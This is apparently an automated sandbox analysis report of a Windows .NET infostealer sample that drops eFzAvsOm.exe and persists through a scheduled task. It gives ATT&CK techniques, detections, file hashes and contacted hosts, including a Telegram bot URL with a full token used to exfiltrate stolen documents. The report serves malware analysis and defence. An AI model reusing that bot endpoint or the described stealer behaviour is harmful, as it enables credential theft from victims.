Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.35f2448.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe.362d868.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7256, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe PID: 7676, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 7936, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: eFzAvsOm.exe PID: 8104, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	121 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	1 Scheduled Task/Job	111 Process Injection	1 Deobfuscate/Decode Files or Information	1 Input Capture	24 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 Scheduled Task/Job	Logon Script (Windows)	1 Scheduled Task/Job	3 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	2 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	211 Security Software Discovery	Distributed Component Object Model	1 Input Capture	3 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Timestomp	LSA Secrets	1 Process Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	141 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Masquerading	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	141 Virtualization/Sandbox Evasion	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	111 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Link
SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	16%	ReversingLabs
SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	30%	Virustotal	Browse
SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Link
C:\Users\user\AppData\Roaming\eFzAvsOm.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\eFzAvsOm.exe	16%	ReversingLabs
C:\Users\user\AppData\Roaming\eFzAvsOm.exe	30%	Virustotal	Browse

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
api.telegram.org	2%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label	Link
http://www.fontbureau.com	0%	URL Reputation	safe
http://www.fontbureau.com/designersG	0%	URL Reputation	safe
http://www.fontbureau.com/designers/?	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
https://account.dyn.com/	0%	URL Reputation	safe
http://www.fontbureau.com/designers?	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.fontbureau.com/designers	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.fontbureau.com/designers/cabarga.htmlN	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.com/designers/frere-user.html	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.fontbureau.com/designers8	0%	URL Reputation	safe
http://www.fonts.com	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument	1%	Virustotal		Browse
https://api.telegram.org	1%	Virustotal		Browse
https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/	1%	Virustotal		Browse
http://api.telegram.org	2%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
api.telegram.org	149.154.167.220	true	true	2%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/sendDocument	true	1%, Virustotal, Browse	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse	unknown
http://www.fontbureau.com	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designersG	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/?	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://account.dyn.com/	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
http://www.fontbureau.com/designers?	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.tiro.com	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.goodfont.co.kr	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.jiyu-kobo.co.jp/	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fonts.com	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sandoll.co.kr	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.urwpp.deDPlease	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.telegram.org/bot6712831410:AAHcAQdRCEA5D54-vSqmAsfuFOnMq6rPNCg/	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1770965448.00000000035F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B21000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000A.00000002.1819723552.0000000003E63000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2940719657.0000000000417000.00000040.00000400.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002F91000.00000004.00000800.00020000.00000000.sdmp	true	1%, Virustotal, Browse	unknown
http://www.zhongyicts.com.cn	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://api.telegram.org	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B89000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FF9000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1769422438.00000000025B0000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000008.00000002.2945148313.0000000002B76000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000A.00000002.1817829131.0000000002E25000.00000004.00000800.00020000.00000000.sdmp, eFzAvsOm.exe, 0000000D.00000002.2944094662.0000000002FE6000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe, 00000000.00000002.1774007955.0000000006722000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
149.154.167.220	api.telegram.org	United Kingdom		62041	TELEGRAMRU	true

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1528790
Start date and time:	2024-10-08 09:59:28 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 7m 40s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	18
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@19/15@1/1
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 99% Number of executed functions: 551 Number of non-executed functions: 15
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
04:00:26	API Interceptor	1x Sleep call for process: SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe modified
04:00:28	API Interceptor	33x Sleep call for process: powershell.exe modified
04:00:31	API Interceptor	1x Sleep call for process: eFzAvsOm.exe modified
09:00:30	Task Scheduler	Run new task: eFzAvsOm path: C:\Users\user\AppData\Roaming\eFzAvsOm.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
149.154.167.220	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse
	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
api.telegram.org	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	EUYIlr7uUX.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	wrong bank details.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Order.docx.doc	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Urgent inquiry for quotation .exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	VmRHSCaiyc.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99
	rPedidoactualizado.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	T2bmenoX1o.exe	Get hash	malicious	LummaC, Vidar	Browse	149.154.167.99

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	NXPYoHNSgv.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	SWIFT 103 202410071519130850 071024.pdf.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	QUOTATION_OCTQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	po 1105670313_pdf.vbs	Get hash	malicious	Unknown	Browse	149.154.167.220
	PO_89_202876.Pdf.exe	Get hash	malicious	MassLogger RAT, Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	QUOTATIONS#08673.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	shipping.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Contrato de Cesin de Crditos Sin Recurso.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	RFQ PAL-10GN SN 2001964_xls.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Kuwait Offer48783929281-BZ2.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\SecuriteInfo.com.MSIL.Kryptik.HDZY.tr.18191.767.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\eFzAvsOm.exe.log

Download File

Process:	C:\Users\user\AppData\Roaming\eFzAvsOm.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	2232
Entropy (8bit):	5.379460230152629
Encrypted:	false
SSDEEP:	48:fWSU4y4RQmFoUeWmfgZ9tK8NPZHUm7u1iMuge//ZuUyus:fLHyIFKL3IZ2KRH9OugIs
MD5:	8A63B702A0AF40CAF3B95013F7E270CD
SHA1:	099F79A9B55E1578B2F76DCBAE8CB2B972FDA475
SHA-256:	CD9563C91D2E3790E04A7421AF7ADFC430B58B6C4DE50683FAD7E1B0F26E7372
SHA-512:	09310AB914B5F697D3006DD80BA8EAA933195EFDCB73D57DFA1F299C539A03167273F70B563EB0BA0B504B2E0189BF94C062B6BACCF0ABB3217F4F195A7A0F82
Malicious:	false
Preview:	@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.AutomationL.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices4.................%...K... ...........System.Xml..8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.<...............i..VdqF...\|...........System.ConfigurationH................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2af2zu5v.rvd.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4f4wribb.41j.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
